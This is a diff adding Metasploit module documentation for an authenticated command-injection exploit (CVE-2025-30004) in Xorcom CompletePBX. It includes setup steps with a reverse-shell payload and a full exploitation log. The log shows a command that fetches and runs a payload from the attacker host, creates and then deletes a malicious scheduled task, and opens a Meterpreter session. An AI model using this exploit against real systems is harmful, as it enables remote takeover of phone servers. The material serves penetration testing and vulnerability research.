Merge pull request #20338 from Chocapikk/xorcom

Add auxiliary and exploit modules for Xorcom CompletePBX 5.2.35 CVEs (2025-2292, 30004, 30005)

documentation/modules/exploit/linux/http/xorcom_completepbx_scheduler.md

@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+This Metasploit module exploits an **Authenticated Command Injection** vulnerability in **Xorcom CompletePBX <= 5.2.35**.
+The issue resides in the task scheduler functionality, where user-controlled input is improperly sanitized, allowing
+arbitrary command execution with web server privileges.
+
+Only the **superadmin** user (`admin`) has the necessary permissions to trigger this exploit.
+Even when creating a new user with maximum privileges, the vulnerability does not work.
+
+The vulnerability is identified as **CVE-2025-30004**.
+
+### Setup
+
+Download the ova file here: [](https://archive.org/details/completepbx-5-2-27-vuln)
+
+## Verification Steps
+
+1. Deploy a vulnerable instance of **Xorcom CompletePBX <= 5.2.35**.
+2. Launch **Metasploit Framework**.
+3. Use the module:
+```
+use exploit/linux/http/xorcom_completepbx_scheduler_rce
+```
+4. Set the **target host**:
+```
+set RHOSTS [TARGET_IP]
+```
+5. Set authentication credentials:
+```
+set USERNAME [VALID_ADMIN_USERNAME]
+set PASSWORD [VALID_ADMIN_PASSWORD]
+```
+6. Configure the payload:
+```
+set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+set LHOST [ATTACKER_IP]
+set LPORT [LISTENER_PORT]
+```
+7. Execute the module:
+```
+run
+```
+8. If successful, a **Meterpreter session** will be opened on the target.
+
+## Options
+
+### USERNAME
+
+Admin username for authentication.
+
+### PASSWORD
+
+Admin password for authentication.
+
+## Scenarios
+
+### Successful Exploitation Against a Vulnerable CompletePBX Instance
+
+**Setup**:
+
+- **Target**: Xorcom CompletePBX <= 5.2.35
+- **Attacker**: Metasploit Framework instance
+
+**Steps**:
+
+```bash
+msf6 exploit(linux/http/xorcom_completepbx_scheduler) > run http://192.168.1.32/
+[*] Command to run on remote host: curl -so ./HEuUpqtYDav http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA;chmod +x ./HEuUpqtYDav;./HEuUpqtYDav&
+[*] Fetch handler listening on 192.168.1.36:8080
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if the target is running CompletePBX...
+[+] Detected CompletePBX on 192.168.1.32:80
+[+] The target appears to be vulnerable.
+[*] Attempting authentication with username: admin
+[+] Authentication successful! Session ID: sid=697e43b483efc1ac316461cde1fbb5d470abc3b4
+[*] Creating malicious scheduled task with description: Possimus quibusdam assumenda minima.
+[+] Malicious task successfully created.
+[*] Retrieving latest task ID for description: Possimus quibusdam assumenda minima....
+[+] Found task with ID: 18
+[*] Executing malicious task ID 18...
+[*] Client 192.168.1.32 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 192.168.1.32 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.1.32
+[+] Task executed successfully!
+[*] Sending delete request (mode=delete) for task ID 18...
+[*] Sending delete request (mode=deleteConfirmed) for task ID 18...
+[+] Task 18 deleted successfully!
+[*] Meterpreter session 6 opened (192.168.1.36:4444 -> 192.168.1.32:40800) at 2025-07-16 21:11:31 +0200
+
+meterpreter > sysinfo 
+Computer     : localhost.localdomain
+OS           : Debian 12.5 (Linux 6.1.0-20-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Impact
+
+- This vulnerability grants **remote code execution** capabilities.
+- Attackers can execute arbitrary commands as the **web server user**, potentially leading to full system compromise.
+- Exploitation provides a **Meterpreter session** for post-exploitation activities.
+
+This module is designed to **demonstrate and automate** the exploitation of this issue using the Metasploit framework.